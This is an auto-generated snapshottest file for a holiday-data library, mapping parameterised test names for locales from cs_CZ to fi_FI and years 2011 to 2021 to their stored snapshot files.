from __future__ import unicode_literals
from snapshottest import Snapshot
from snapshottest.file import FileSnapshot
snapshots = Snapshot()
snapshots['test_holidata_produces_holidays_for_locale_and_year[cs_CZ-2011] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[cs_CZ-2011] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[cs_CZ-2012] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[cs_CZ-2012] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[cs_CZ-2013] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[cs_CZ-2013] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[cs_CZ-2014] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[cs_CZ-2014] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[cs_CZ-2015] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[cs_CZ-2015] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[cs_CZ-2016] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[cs_CZ-2016] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[cs_CZ-2017] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[cs_CZ-2017] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[cs_CZ-2018] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[cs_CZ-2018] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[cs_CZ-2019] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[cs_CZ-2019] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[cs_CZ-2020] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[cs_CZ-2020] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[cs_CZ-2021] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[cs_CZ-2021] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[da_DK-2011] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[da_DK-2011] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[da_DK-2012] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[da_DK-2012] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[da_DK-2013] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[da_DK-2013] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[da_DK-2014] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[da_DK-2014] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[da_DK-2015] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[da_DK-2015] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[da_DK-2016] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[da_DK-2016] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[da_DK-2017] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[da_DK-2017] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[da_DK-2018] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[da_DK-2018] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[da_DK-2019] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[da_DK-2019] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[da_DK-2020] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[da_DK-2020] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[da_DK-2021] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[da_DK-2021] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_AT-2011] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_AT-2011] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_AT-2012] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_AT-2012] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_AT-2013] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_AT-2013] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_AT-2014] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_AT-2014] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_AT-2015] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_AT-2015] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_AT-2016] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_AT-2016] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_AT-2017] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_AT-2017] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_AT-2018] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_AT-2018] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_AT-2019] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_AT-2019] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_AT-2020] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_AT-2020] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_AT-2021] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_AT-2021] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_BE-2011] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_BE-2011] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_BE-2012] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_BE-2012] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_BE-2013] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_BE-2013] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_BE-2014] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_BE-2014] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_BE-2015] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_BE-2015] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_BE-2016] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_BE-2016] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_BE-2017] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_BE-2017] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_BE-2018] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_BE-2018] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_BE-2019] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_BE-2019] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_BE-2020] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_BE-2020] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_BE-2021] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_BE-2021] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_CH-2011] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_CH-2011] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_CH-2012] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_CH-2012] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_CH-2013] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_CH-2013] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_CH-2014] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_CH-2014] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_CH-2015] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_CH-2015] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_CH-2016] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_CH-2016] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_CH-2017] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_CH-2017] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_CH-2018] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_CH-2018] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_CH-2019] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_CH-2019] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_CH-2020] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_CH-2020] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_CH-2021] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_CH-2021] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_DE-2011] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_DE-2011] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_DE-2012] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_DE-2012] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_DE-2013] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_DE-2013] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_DE-2014] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_DE-2014] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_DE-2015] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_DE-2015] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_DE-2016] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_DE-2016] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_DE-2017] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_DE-2017] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_DE-2018] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_DE-2018] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_DE-2019] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_DE-2019] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_DE-2020] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_DE-2020] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[de_DE-2021] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[de_DE-2021] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[el_GR-2011] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[el_GR-2011] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[el_GR-2012] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[el_GR-2012] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[el_GR-2013] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[el_GR-2013] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[el_GR-2014] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[el_GR-2014] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[el_GR-2015] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[el_GR-2015] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[el_GR-2016] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[el_GR-2016] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[el_GR-2017] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[el_GR-2017] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[el_GR-2018] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[el_GR-2018] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[el_GR-2019] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[el_GR-2019] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[el_GR-2020] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[el_GR-2020] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[el_GR-2021] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[el_GR-2021] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_CA-2011] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_CA-2011] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_CA-2012] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_CA-2012] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_CA-2013] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_CA-2013] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_CA-2014] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_CA-2014] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_CA-2015] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_CA-2015] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_CA-2016] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_CA-2016] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_CA-2017] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_CA-2017] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_CA-2018] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_CA-2018] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_CA-2019] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_CA-2019] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_CA-2020] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_CA-2020] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_CA-2021] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_CA-2021] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_GB-2011] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_GB-2011] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_GB-2012] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_GB-2012] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_GB-2013] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_GB-2013] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_GB-2014] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_GB-2014] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_GB-2015] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_GB-2015] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_GB-2016] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_GB-2016] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_GB-2017] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_GB-2017] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_GB-2018] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_GB-2018] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_GB-2019] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_GB-2019] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_GB-2020] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_GB-2020] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_GB-2021] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_GB-2021] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_NZ-2011] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_NZ-2011] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_NZ-2012] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_NZ-2012] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_NZ-2013] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_NZ-2013] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_NZ-2014] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_NZ-2014] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_NZ-2015] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_NZ-2015] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_NZ-2016] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_NZ-2016] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_NZ-2017] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_NZ-2017] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_NZ-2018] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_NZ-2018] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_NZ-2019] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_NZ-2019] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_NZ-2020] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_NZ-2020] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_NZ-2021] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_NZ-2021] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_US-2011] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_US-2011] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_US-2012] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_US-2012] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_US-2013] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_US-2013] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_US-2014] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_US-2014] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_US-2015] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_US-2015] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_US-2016] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_US-2016] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_US-2017] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_US-2017] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_US-2018] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_US-2018] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_US-2019] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_US-2019] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_US-2020] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_US-2020] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[en_US-2021] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_US-2021] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_CO-2011] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_CO-2011] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_CO-2012] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_CO-2012] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_CO-2013] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_CO-2013] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_CO-2014] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_CO-2014] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_CO-2015] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_CO-2015] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_CO-2016] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_CO-2016] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_CO-2017] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_CO-2017] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_CO-2018] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_CO-2018] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_CO-2019] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_CO-2019] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_CO-2020] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_CO-2020] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_CO-2021] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_CO-2021] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_ES-2011] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_ES-2011] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_ES-2012] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_ES-2012] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_ES-2013] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_ES-2013] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_ES-2014] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_ES-2014] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_ES-2015] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_ES-2015] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_ES-2016] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_ES-2016] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_ES-2017] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_ES-2017] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_ES-2018] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_ES-2018] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_ES-2019] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_ES-2019] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_ES-2020] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_ES-2020] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_ES-2021] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_ES-2021] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_US-2011] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_US-2011] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_US-2012] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_US-2012] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_US-2013] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_US-2013] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_US-2014] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_US-2014] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_US-2015] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_US-2015] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_US-2016] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_US-2016] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_US-2017] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_US-2017] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_US-2018] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_US-2018] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_US-2019] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_US-2019] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_US-2020] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_US-2020] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[es_US-2021] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[es_US-2021] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[fi_FI-2011] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[fi_FI-2011] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[fi_FI-2012] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[fi_FI-2012] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[fi_FI-2013] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[fi_FI-2013] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[fi_FI-2014] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[fi_FI-2014] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[fi_FI-2015] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[fi_FI-2015] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[fi_FI-2016] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[fi_FI-2016] 1.py')
